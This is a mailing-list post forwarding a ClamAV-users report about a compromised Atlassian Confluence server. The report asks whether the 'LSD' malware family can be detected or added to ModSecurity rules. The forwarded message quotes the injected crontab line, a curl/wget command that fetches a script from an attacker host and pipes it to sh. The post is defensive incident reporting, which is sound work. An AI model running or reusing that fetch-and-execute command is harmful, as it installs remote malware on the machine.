Good day Guys
I just came across the following on the Clamav mailinglist.
Is this not something that can be added to Modsecurity ruleset?
For example look at '||wget' and ')|sh'.
Regards
Brent Clark
-------- Forwarded Message --------
Subject: [clamav-users] LSD Malwares
Date: Thu, 25 Apr 2019 14:52:05 +0530
From: Xavier Maysonnave via clamav-users <cla...@li...>
Reply-To: ClamAV users ML <cla...@li...>
To: cla...@li...
CC: Xavier Maysonnave <x.m...@gm...>
Dear Friends,
We recently faced an Atlassian Confluence issue lately.
Atlassian issued a security advisory the 29/03/2019
<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>.
Following this thread
<https://community.atlassian.com/t5/Confluence-discussions/khugepageds-eating-all-of-the-CPU/td-p/1055337>,
We understood what happened on our server.
Confluence is running in its own user space and have seen its crontab
hacked.
On our Debian Stretch the 'crontab -u confluence -e' shows a non legit
instruction :
*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget
<http://dd.heheda.tk/i.jpg||wget> -q -O- https://dd.heheda.tk/i.jpg)|sh
Obviously the security flaw in Confluence open the gate to this behaviour.
As we are running Confluence in its own user space, the i.jpg who
contains the shell script file didn't harm our server. No malwares have
been deployed however the server was shutting down immediately after
starting.
We cleaned up the crontab and upgraded Confluence to avoid any further
infection.
However we need to check our installation and I'm wondering if ClamAV
knows already this malware family
<https://git.laucyun.com/security/lsd_malware_clean_tool/blob/master/README.md>.
I already open a report to ClamAV. is there any user who faced this
issue and is ClamAV ready to detect and cleanup our Linux boxes ?
Any pointers about any informations about this LSD Malware family will
be greatly appreciated as I try to evaluate the risks for our
infrastructure (I checked various DB with no success and googled too).
Warmly.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
|
){kind=link}